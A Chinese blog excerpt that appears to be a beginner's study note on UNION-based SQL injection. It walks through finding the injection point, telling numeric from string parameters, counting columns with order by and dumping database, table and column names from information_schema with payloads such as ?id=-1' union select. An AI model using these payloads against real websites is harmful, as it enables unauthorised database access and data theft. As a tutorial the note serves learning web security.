博客摘录「sql联合查询注入」

已于 2023-10-05 21:00:34 修改
阅读量298 收藏 3
点赞数 5
分类专栏: 新手成长日记 文章标签: 笔记
于 2023-10-05 20:59:17 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Harder_Hacker/article/details/133587404
版权

联合查询注入的过程

1、判断注入点

2、判断是整型还是字符型

3、判断查询列数

4、获取数据库名

5、获取数据库中的表名

6、获取字段名

7、获取字段中的数据

  1. 注入点
    sql联合查询的注入点都比较明显, 必须是页面上的显示位(页面中展示数据库中数据的位置),否则无法注入,如id,name等等。

  2. 判断整形还是字符型
    (1)尝试使用加单引号或双引号
    显示数据库错误信息或者页面回显不同可以判断是整形注入和字符型注入.整型注入没有变化,而字符型注入则回显不同
    (2)*输入’ and 1=1和 ’ and 1=2 *
    发现页面变化,判断为字符注入

  3. 查询列数
    使用order by函数 对MySQL中查询结果按照指定字段名进行排序,order by 1.2.3…第一个查询字段为1,第二个为2,依次类推。

  4. 获取数据库名
    使用 group_concat()将所有的表名联系在一起
    select group_concat(SCHEMA_NAME) from information_schema.SCHEMATA
    例如?id=-1' union select 1,1,(SELECT GROUP_CONCAT(schema_name) FROM information_schema.schemata)'

  5. 获取数据库中的表名
    在这里使用group_concat()函数加一个数据表名table_name,然后指定一个来源得到库中的表名
    例如select group_concat(table_name) from information_schema.tables where table_schema = '数据库名'

  6. 获取字段名
    知道表名,直接利用sql语句就可以得到所有的字段名
    例如 select group_concat(column_name) from information_schema.columns where table_schema='test' and table_name='表名'

  7. 获取字段中的数据
    例如id=-1' union select 1,1,(SELECT GROUP_CONCAT(column_name) FROM information_schema.columns WHERE table_name = '字段')————————————————

  8. 版权声明:本文为CSDN博主「暮秋.十七」的原创文章,遵循CC 4.0 BY-SA版权协议,转载请附上原文出处链接及本声明。

  9. 原文链接:https://blog.csdn.net/m0_65977612/article/details/127929030

Jackson_Roy
关注
专栏目录
读“NoSQL注入的分析和缓解”之摘录
zhangge3663的博客
03-27 604
一、NoSQL攻击途径     可以大致分为以下5类:      1.重言式。又称永真式。此类攻击是在条件语句中注入代码,使生成的表达式判定结果永远为真,从而绕过认证或访问机制。       2.联合查询联合查询是一种众所周知的SQL注入技术,攻击者利用一个脆弱的参数去改变给定查询返回的数据集。联合查询最常用的用法是绕过认证页面获取数据。在本文中,我们将展示一个攻击示例,它将通过增加永真的表达式...
MongoDB简介摘录
匿 <h7>应该不可以</h7>
11-14 558
mongodb简介 mongodb优缺点 mongodb适合场景
sqlmap基础使用手册 ─=≡Σ(((つ•̀ω•́)つ 知己知彼百战百胜 >web安全<
寻觅的博客
03-03 2256
文章目录sqlmap简介sqlmap特性sqlmap下载安装与启动sqlmap基础使用 sqlmap简介 顾名思义,sqlmap是一个自动化sql注入的开源的渗透工具,它可以自动化检测和利用SQL注入缺陷以及接管数据库服务器的过程。他有一个强大的检测引擎,许多适合于终极渗透测试的小众特性和广泛的开关,从数据库指纹、从数据库获取数据到访问底层文件系统和通过带外连接在操作系统上执行命令。官方网址 如果...
MySQL学习笔记
weiruia的博客
02-18 576
1、初试MySQL JavaEE: 企业级Java开发 Web 前端(页面:展示,数据!) 后台(连接点:连接数据库JDBC、连接前端(控制、控制视图跳转、给前端传递数据)) 数据库(存数据、Txt、Excel、World) 只会写代码,学好数据库,基本混饭吃~ 操作系统、数据结构与算法、一个不错的程序员~ 离散数学、数字电路、体系结构 + 实战经验 高级程序猿~ 1.1、为什么学数据库 岗位需求 大数据时代~ 得数据者得天下~ 被迫需求:存数据 去IOE 数据库是所有软件体系中最核心的存在
天涯PHP博客-文章存档
天涯PHP博客
11-12 1318
[2012-11-09] 摘自PHP手册[8] – String字符串处理函数 [2012-11-08] 摘自PHP手册[7] – Variable变量函数 [2012-11-08] 摘自PHP手册[6] – URL函数 [2012-11-06] 摘自PHP手册[5] – Date/Time 日期/时间函数 [2012-11-05] 摘自PHP手册[4] – Funct
顶尖程序员会遇到的面试问题
漫长学习路
12-13 921
下面摘录一下顶尖程序员遇到的问题,后面会不定期发布一下答案,有知道答案的可以写在评论里面,当然答案不求详细尽量简洁,让我们在面试的时候可以提高成功率。直接写编号例如 一 1:答案 大家共同进步。一、数据结构与算法基础1.说一下几种常见的排序算法和分别的复杂度。 2.用Java写一个冒泡排序算法 3.描述一下链式存储结构。 4.如何遍历一棵二叉树? 5.倒排一个LinkedList。 6.用Java
DataBase笔记
WWTODO的博客
01-29 324
对数据的结构和形式进行定义,一般用于数据库和表的创建、删除、修改等。命令说明CREATE用于在数据库中创建一个新表、一个视图或者其它对象。ALTER用于修改现有的数据库,比如表、记录。DROP用于删除整个表、视图或者数据库中的其它对象在 RDBMS 中,数据被存储在一种称为表(Table)的数据库对象中,它和 Excel 表格类似,都由许多行(Row)和列(Column)构成。每一行都是一条数据,每一列都是数据的一个属性,整个表就是若干条相关数据的集合。
JAVA上百实例源码以及开源项目
热门推荐
http://www.54tianzhisheng.cn/
01-03 2万+
笔者当初为了学习JAVA,收集了很多经典源码,源码难易程度分为初级、中级、高级等,详情看源码列表,需要的可以直接下载! 这些源码反映了那时那景笔者对未来的盲目,对代码的热情、执着,对IT的憧憬、向往!此时此景,笔者只专注Android、Iphone等移动平台开发,看着这些源码心中有万分感慨,写此文章纪念那时那景!
我的2023年护网蓝队面试题(一面)
qq_63217130的博客
05-13 6718
我的2023年蓝初面试经历(一面)
q3-2017-state-of-the-internet-security-report.pdf
02-27
其中SQL注入SQLi)攻击增长显著,与上一年同期相比增长了62%,与上一季度相比增长了19%。 2. 分布式拒绝服务(DDoS)攻击的情况: 与2016年第三季度相比,DDoS攻击总量略有减少,下降了3%。基础设施层(层3和层4...
JAVA上百实例源码以及开源项目源代码
12-11
部分源代码摘录: ftpClient = new FtpClient(); //实例化FtpClient对象 String serverAddr=jtfServer.getText(); //得到服务器地址 String user=jtfUser.getText(); //得到用户名 String pass=jtfPass.getPassword...
4.常见web安全漏洞与加固
asdf390的博客
05-07 1099
SQL 注入漏洞的影响可以归纳为以下4 个方面。 目前,大多数网站都以数据库为驱动,这进一步增加了SQL 注入漏洞产生的可能性,因此对于涉及SQL 的相关操作,需要格外注意。 2.SQL 注入分类 SQL 注入可以按照不同的分类方式分为多种类型,如通过参数类型、注入位置等,下文将详细介绍不同的分类方式及一些重要的注入类型。 按照输入参数的类型不同,可以将SQL 注入分为数字型注入和字符型注入。 这两种注入的最大区别在于,字符型注入一般要使用单引号进行闭合,而数字型注入不需要...
sqlite-sqlite3高级2
一盘青椒炒肉
02-27 663
SQLite Truncate Table 在 SQLite 中,并没有 TRUNCATE TABLE 命令,但可以使用 SQLite 的 DELETE 命令从已有的表中删除全部的数据,但建议使用 DROP TABLE 命令删除整个表,然后再重新创建一遍。 语法 DELETE 命令的基本语法如下: sqlite> DELETE FROM table_name; DROP TAB
STM32学习笔记(二、初识stm32单片机)
tommorrowwill的博客
09-10 776
首先stm32是意法半导体公司(ST)使用ARM公司的Cortex-M为核心生产的32位的单片机。其中,ST---意法半导体公司,即SOC厂商。M---为Microelectronics的缩写,即微型处理器。32---表示控制器为32位的。103---表示F系列的子系列。
C++学习笔记----6、内存管理(五)---- 智能指针(3)
weixin_71738303的博客
09-11 1150
与指向特定类型的原始指针可以转化为不同类型的指针一样,shared_ptr保存特定的类型可以转化为一个另一种类型的shared_ptr。转化shared_ptr的函数是const_pointer_cast(),dynamic_pointer_cast(),static_pointer_cast()和reinterpret_pointer_cast()。前面简要提过,当拥有共享属主的智能指针,例如shared_ptr不在活动范围或者被重置时,只有它是最后指向的智能指针时才能释放其指向的资源。
UEFI学习笔记(五):EDK II PCD的概念、类型、使用
最新发布
qq_44189622的博客
09-11 823
如果在BIOS里面有一些模块是binary方式集成进来的而这些binary又需要用到PCD(用于Binary Release),那么这些Binary集成的要用到的PCD就必须要设置为。PCD的值存在memory里面,下次启动时,上次更改的值丢失了,每次启动都是从default值开始。是存在VPD空间的(在FLASH上,只读),一般是出厂配置。如果platform是从源码build出来的,没有binary在里面的时候,PCD用的都是。作用域在一个模块中(模块级的),可以在Binary Level进行修改。
OJ在线判题系统项目笔记
今天不coding的博客
09-11 768
OJ在线判题系统项目笔记
经验笔记:Web 浏览器存储手段
qq_45831414的博客
09-10 874
以上就是使用 IndexedDB 的基本步骤。IndexedDB 提供了强大的数据存储能力,并且可以通过索引来优化数据检索性能。在实际应用中,可能还需要处理更复杂的场景,比如数据迁移、错误处理等。务必确保你的代码能够妥善处理各种异常情况。
Oracle SQL建表与基础SELECT查询详解
不过,这部分内容不在提供的摘录中,但理解了基础的SELECT语句后,JOIN通常会作为进一步学习的主题。 总结来说,本章的核心内容包括了基础的建表结构设置,SELECT语句的使用,以及如何通过算数表达式和括号调整运算...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值